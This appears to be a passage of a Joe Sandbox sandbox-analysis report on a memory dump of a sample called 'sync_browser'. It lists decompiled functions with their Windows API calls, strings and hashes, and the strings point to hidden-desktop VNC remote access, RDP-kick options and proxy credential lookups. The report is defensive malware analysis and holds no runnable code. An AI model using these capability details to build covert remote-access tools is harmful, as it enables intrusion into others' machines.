Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 1907048692-1814171851
Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
Instruction ID: 1bc6a0d1e90b24fe3bc1eb7f1156ea7e3b51d8023c9543923abdf9f47b1e6e9f
Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
Instruction Fuzzy Hash: 2A311761A1CA82C1EB25FB21B8146AAA3A5FF88744FC54036D98E47778DF3DF106C760

Function 00007FF74002551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF740065F30: EnterCriticalSection.KERNEL32(?,?,?,00007FF740023ABC), ref: 00007FF740065F41
Part of subcall function 00007FF740065F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF740023ABC), ref: 00007FF740065F75

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2

Part of subcall function 00007FF740065F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF740023ABC), ref: 00007FF740065F8C

EnterCriticalSection.KERNEL32 ref: 00007FF7400255F1
LeaveCriticalSection.KERNEL32 ref: 00007FF740025622
InvalidateRect.USER32 ref: 00007FF7400256E7
LeaveCriticalSection.KERNEL32 ref: 00007FF7400256FE

Strings

W, xrefs: 00007FF7400255E4
vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1769082246-4238595597
Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction ID: f927ea2233521bd2267305b442883b63ffc37ebc86acdc85493d49d0d97719db
Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction Fuzzy Hash: CFE1AE32A0C6D1C5E754FB29C458BEDBBA1EB89B84F854036DA4C477A9CF39E841C720

Function 00007FF740025958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7400259AB

Part of subcall function 00007FF74002C2C0: EnterCriticalSection.KERNEL32 ref: 00007FF74002C326
Part of subcall function 00007FF74002C2C0: LeaveCriticalSection.KERNEL32 ref: 00007FF74002C33B

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
X, xrefs: 00007FF7400259A1
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave
String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2801635615-1537001432
Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction ID: 485f79c4edfd0e8d3e1b1def6174e2c0c8a0077ea5af77a62fe8b5305f4e018a
Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction Fuzzy Hash: 1ED1B122A0C691C5E750FB25C458BFEB7A1EB85B84F854139CA4D477B9CF39E885C720

Function 00007FF74000AB70 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF74000ABA9
GetLastError.KERNEL32 ref: 00007FF74000ABB3
SystemParametersInfoA.USER32 ref: 00007FF74000AC07
GetLastError.KERNEL32 ref: 00007FF74000AC11
SystemParametersInfoA.USER32 ref: 00007FF74000AC62
GetLastError.KERNEL32 ref: 00007FF74000AC6C

Strings

HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF74000ABB9
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF74000AC8A
HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF74000AC2F
HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF74000AC17
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF74000ABD4
HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF74000AC72

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
API String ID: 2777246624-426764769
Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction ID: 5cfd01ee38166f30c4e275c376ee00aed01c30f7cc7f372eaab16736206890a4
Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction Fuzzy Hash: A1314B60E0C647C6F724BB21B805BB9A7A1BF95748FC18035C44D567B8DE2CB90ACB71

Function 00007FF7400311E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF74003C1D6), ref: 00007FF740031206
CreateCompatibleBitmap.GDI32 ref: 00007FF740031221
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF74003C1D6), ref: 00007FF740031236
SelectObject.GDI32 ref: 00007FF740031255
DeleteObject.GDI32 ref: 00007FF740031266
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF74003C1D6), ref: 00007FF740031273

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
String ID:
API String ID: 4219907860-0
Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction ID: 783a7436ec44a876e483ec81b0f446716fa3a430b9134c6bd0dece0c3f05ad9e
Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction Fuzzy Hash: 1E41562161C692D6E720BF55A8446BAB360FF88BD8F405135DE5E47B68DF7CE104C720

Function 00007FF740011640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 132COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF740011671
GetModuleFileNameA.KERNEL32 ref: 00007FF7400116B3
GetPrivateProfileIntA.KERNEL32 ref: 00007FF740011767
GetPrivateProfileIntA.KERNEL32 ref: 00007FF740011790
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7400117CE

Strings

clearconsole, xrefs: 00007FF74001177C
_run, xrefs: 00007FF74001172A
kickrdp, xrefs: 00007FF740011759
-service_run, xrefs: 00007FF74001184B
admin, xrefs: 00007FF740011760, 00007FF740011783, 00007FF7400117BF
service_commandline, xrefs: 00007FF7400117B3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$FileModuleNameStringVersion
String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
API String ID: 769895750-1251308945
Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction ID: d21dc68d700a58afe32b2eddaf56d64dd9fb42db1dc2eb361ff8053895e5136b
Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction Fuzzy Hash: D1519F21A0C686C5E750BB24B4402B9B7A0FB447A4F848336EABD537E9DF3CE505CB60

Function 00007FF740031AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740031B1E
GetProcAddress.KERNEL32 ref: 00007FF740031B36
LoadLibraryA.KERNEL32 ref: 00007FF740031B44
GetProcAddress.KERNEL32 ref: 00007FF740031B5C
FreeLibrary.KERNEL32 ref: 00007FF740031C51
FreeLibrary.KERNEL32 ref: 00007FF740031C62
FreeLibrary.KERNEL32 ref: 00007FF740031C71

Strings

(, xrefs: 00007FF740031B0F
MonitorFromPointA, xrefs: 00007FF740031B52
USER32, xrefs: 00007FF740031B17, 00007FF740031B3D
GetMonitorInfoA, xrefs: 00007FF740031B2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressLoadProc
String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
API String ID: 1386263645-671781545
Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction ID: 52193b91455b18b1498ae95bb263d88c40b36cffadca0710ecfc90d101a6996e
Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
Instruction Fuzzy Hash: 4B416A3192C602C6EB6ABF21EA543B8A2A0EF89B58F906130C51D463ECDF7DF4458721

Function 00007FF74000B310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF74000B338

Part of subcall function 00007FF7400B9500: _errno.LIBCMT ref: 00007FF7400B9515
Part of subcall function 00007FF7400B9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B9520

_wgetenv.LIBCMT ref: 00007FF74000B373
_wgetenv.LIBCMT ref: 00007FF74000B3A5
_wgetenv.LIBCMT ref: 00007FF74000B3C7
_wgetenv.LIBCMT ref: 00007FF74000B3F5
GetUserNameA.ADVAPI32 ref: 00007FF74000B436

Strings

SOCKS5_USER, xrefs: 00007FF74000B331, 00007FF74000B345
HTTP_PROXY_USER, xrefs: 00007FF74000B3C0, 00007FF74000B3D4
CONNECT_USER, xrefs: 00007FF74000B3EE, 00007FF74000B402
SOCKS4_USER, xrefs: 00007FF74000B36C, 00007FF74000B380
SOCKS_USER, xrefs: 00007FF74000B39E, 00007FF74000B3B2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
API String ID: 3057866299-2798169553
Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction ID: 9ab7ea99367f17a2d43337a5e42712441d36ee75df03fe1ad2a52bad244337b2
Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
Instruction Fuzzy Hash: 0931B521A1EA46D1FE65BB15F4916B8E2A0BF64744FD80435DA0D463BAFF2CFA44C360

Function 00007FF740013A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF740013A8C
RegCreateKeyExA.ADVAPI32 ref: 00007FF740013AF7
RegOpenKeyExA.ADVAPI32 ref: 00007FF740013B24
RegQueryValueExA.ADVAPI32 ref: 00007FF740013B6A
RegCloseKey.ADVAPI32 ref: 00007FF740013B79
RegCloseKey.ADVAPI32 ref: 00007FF740013B84

Strings

SoftwareSASGeneration, xrefs: 00007FF740013B4B
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF740013ABB
System, xrefs: 00007FF740013B0F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenQueryValueVersion
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 1076069355-3579764778
Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction ID: 5a024607f6efa26522dfd8857109c74c789ab37aff7ec4ac5e1e2bd0a2fdd37f
Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
Instruction Fuzzy Hash: 69313D76A0CB82C6EB60AB10F4547AAF7A0FB88754FC00135E68D46B69DF7CE119CB10

Function 00007FF74001DA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF74001DA63
GetRgnBox.GDI32 ref: 00007FF74001DA7A
GetRgnBox.GDI32 ref: 00007FF74001DABE
GetRgnBox.GDI32 ref: 00007FF74001DAF4
GetRgnBox.GDI32 ref: 00007FF74001DB23
DeleteObject.GDI32 ref: 00007FF74001DB3C
free.LIBCMT ref: 00007FF74001DB47
DeleteObject.GDI32 ref: 00007FF74001DB5A
free.LIBCMT ref: 00007FF74001DB65
DeleteObject.GDI32 ref: 00007FF74001DB75
free.LIBCMT ref: 00007FF74001DB80
LeaveCriticalSection.KERNEL32 ref: 00007FF74001DB89

Part of subcall function 00007FF74000F840: CreateRectRgn.GDI32 ref: 00007FF74000F872
Part of subcall function 00007FF74000F840: CombineRgn.GDI32 ref: 00007FF74000F88A
Part of subcall function 00007FF74000F840: CombineRgn.GDI32 ref: 00007FF74000F89F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
String ID:
API String ID: 707770685-0
Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction ID: 1b30cad5605873697cfb957a3301351a1aa8693412ef35533e2683dee4e872c9
Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
Instruction Fuzzy Hash: F6416F2660CA42C6D650BB29E4842A9B360FBC9BD0F954232EF9E477B9DF3DE504C710

Function 00007FF740070440 Relevance: 18.1, APIs: 12, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF74007045F
GlobalAlloc.KERNEL32(?,?,?,00007FF74002C1D3), ref: 00007FF740070479
GlobalUnlock.KERNEL32 ref: 00007FF740070492

Part of subcall function 00007FF740071740: free.LIBCMT ref: 00007FF740071777

GlobalFree.KERNEL32 ref: 00007FF74007049F
GlobalLock.KERNEL32 ref: 00007FF7400704BA
GlobalUnlock.KERNEL32 ref: 00007FF7400704D3
GlobalFree.KERNEL32 ref: 00007FF7400704E0
GlobalFree.KERNEL32 ref: 00007FF7400704ED
GlobalUnlock.KERNEL32 ref: 00007FF740070607
GlobalFree.KERNEL32 ref: 00007FF740070614
GlobalUnlock.KERNEL32 ref: 00007FF740070626
GlobalFree.KERNEL32 ref: 00007FF740070633

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Free$Unlock$Lock$Allocfree
String ID:
API String ID: 2417228145-0
